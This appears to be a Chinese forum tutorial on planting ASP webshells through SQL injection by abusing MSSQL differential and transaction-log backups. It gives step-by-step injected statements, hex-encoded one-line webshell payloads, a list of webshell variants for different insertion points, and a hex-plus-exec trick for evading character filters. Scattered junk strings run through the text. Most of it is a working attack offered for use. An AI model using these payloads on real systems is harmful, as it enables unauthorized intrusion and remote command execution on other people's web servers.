MSsql差异备份总结

admin

差异备份的流程大概这样：
# n! Z! S/ @  ^% i9 W! ]7 Y8 W% d1.完整备份一次(保存位置当然可以改)
7 C7 r: I( B; _- X1 hbackup database 库名 to disk = 'c:\ddd.bak';--
( y: m8 f' z0 L' N
2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
2 X5 ^& b) c5 o! l0 b. [
3.进行差异备份
9 f: I* ^# j! B5 Mbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

上面
0x3C25657865637574652872657175657374282261222929253E
: T9 t; B! ~- c# E: M' m2 s% y; L就是一句话木马的内容：<%execute(request("a"))%>
) H, S$ ?9 {, R0 L: ~! g8 L
9 C- I- p& F# P0 x% R* |% E3 @% v如下是网上常见的差异备份代码，思路一样！
===================================================
# L" I% h1 e" a6 h4 }. g利用差异备份提高提高backupwebshell的成功率,减少文件大小
( v( M% G0 P6 G- e8 V0 @$ M0 f0 r步骤:
( p0 g  r7 n7 R6 S# q
9 C% H* i1 l9 V' l$ ^declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库
/ a; \6 u" h' V& R' b
% d  X  w( I0 {/ M' j+ @4 Jcreate table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表
7 E4 I" m; L/ k" G/ E
; q, d8 w9 o/ b% V+ U9 e
" z1 @: c  n: y, _) ^5 [+ uinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中
/ g8 `6 R1 `8 E' A" L/ h2 j! B7 N1 U( a
  W* H  I3 ?0 D7 Zdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

drop table [xiaolu]  -- 删除此表。
; d3 S7 L* L" P. u7 O# w
* f# [& _# L( Y6 A) T0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
+ ^, n! w" V# A9 B7 O/ g0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
( n! S2 D! l2 N: O  d' b
. y" t1 l6 a0 F; e' m2 m, j" ?6 A% i声明：方法不是我想的，我只是写工具，默认得到shell是
3 u& W" u7 B$ U<%execute(request("a"))%>
  ^+ k, K/ W2 S1 f===============================================================

+ W- i" J/ V" E5 `' H7 }# e( e我发现上面代码，有时会无效，而直接用
) M% U8 L! m7 q4 t4 Y& E
backup database 库名 to disk = 'c:\ddd.bak'
. @+ B, L& j0 l# r
8 i5 l6 E' k( S0 Zcreate table [dbo].[dtest] ([cmd] [image]);

9 t' k" ~( f6 C1 Z; M1 Ninsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
3 i$ M( A& m+ ~3 V
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

8 Z9 d) @$ }$ R  y+ ^3 g: G库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
3 Z9 B, C9 B/ l1 y, c/ u0 j
6 U3 m2 D( d# C3 s" J% E7 ]7 V网上还有log增量备份的，我也把他记录一下
  Y- Q8 R% m' U' ~$ B=====================================================
另一种log增量备份技术:
9 t  C' w, Y( y3 E" u. v0 G# F  S
) _* ^0 e* s. v. }';alter database null set RECOVERY FULL--
- L3 Y7 l2 v3 d4 h6 g8 k
2 r' J+ o( w6 ?: w';create table cmd (a image)--

';backup log null to disk = 'f:\cmd' with init--

) J( W4 y5 h7 u: J% \% o';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
3 f# q# d+ }/ f: w
2 T- m9 r/ \" {+ L8 ]3 n% i+ z';backup log null to disk = '备份路径'--

';drop table cmd--
6 @( @5 C9 L. y
1 B7 t, Y% I8 i# l) E! p3 {';alter database XXX set RECOVERY SIMPLE--
5 x/ ^: b8 J& t4 M  d5 K& E$ I
PS:0x3C2565786563757465287265717565737428226122292
) f$ Q, L0 J" z$ K9253EDA 是一句话小马16进制转来的
, J3 S$ W; R2 Z& [0 R( a1 L
说到一句话马，还可以有这么几种写法：
  @! A) ^. {- e0 S+ Z4 h
. w8 `* r* G0 r% ia)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
1 b: W  O! Y6 j& C$ Q8 F: Q/ ac)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
9 m4 O( k! e7 Pe)<%25Execute(request("a"))%25>
f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
9 ?9 |" z6 J  S  w5 H; H, ug)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
/ V9 `3 M/ ~, n  P7 B0 {9 @h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
% s; B9 i. D7 m( K: Z) Q: \: gI)<%eval request(0)%>
( ?4 b4 y" f+ |3 w( i4 R. @J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

4 [: W# v6 d, k& X8 {* P0 ?% I=============================================
& {, m  z/ B, K9 u" p; L5 z
当遇到差备过滤了/时用这个语句代替
( e( a3 n% o2 w! p
4 b0 z5 O3 l: U8 Xdeclare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

& ~7 Z; g3 c. M8 [5 Z1 O3 p把要执行的语句转16进制然后用exec执行

4 V4 `( d) U$ _2 P
% i: w: {1 r, G, ]减少备份文件大小方法如下:
7 }9 M3 i2 l, ~2 B$ V
总的来说就是那么简单几句,下面以备份数据库model为例子
$ T4 d+ a/ Z( [: \0 j) H1
, G) u6 \; T' ?& Y# f" z6 x! fid=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
1 a9 Q7 S5 I. N  z/ c) j& q$ N2
id=1;backup database model to disk='你的路径‘ with differential,format;--
' X8 A0 ?& l0 H. y1 |* M3 E


SQL语句清理日志
$ R: G# _; p% q' r* E注：test为数据库名
7 e6 `, i: V) x4 v5 L# U" J7 H6 [
--清空日志
9 D4 \$ P- p$ VDUMP TRANSACTION test WITH NO_LOG
. h7 [; @. f% ^! u/ O' [' w9 H( b7 ?" e
# e& `) R" D8 A--截断事务日志
BACKUP LOG test WITH NO_LOG

% Q& a- H) x9 Z--收缩数据库
DBCC SHRINKDATABASE(test)

+ ]: V" W1 N8 [+ i--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)
: g/ F0 ~' c8 J% A
9 }5 g5 z6 [9 a+ P6 Y  x8 i--以后能自动收缩
2 c! A" u7 J' m9 R6 P) bEXEC sp_dboption 'test', 'autoshrink', 'TRUE'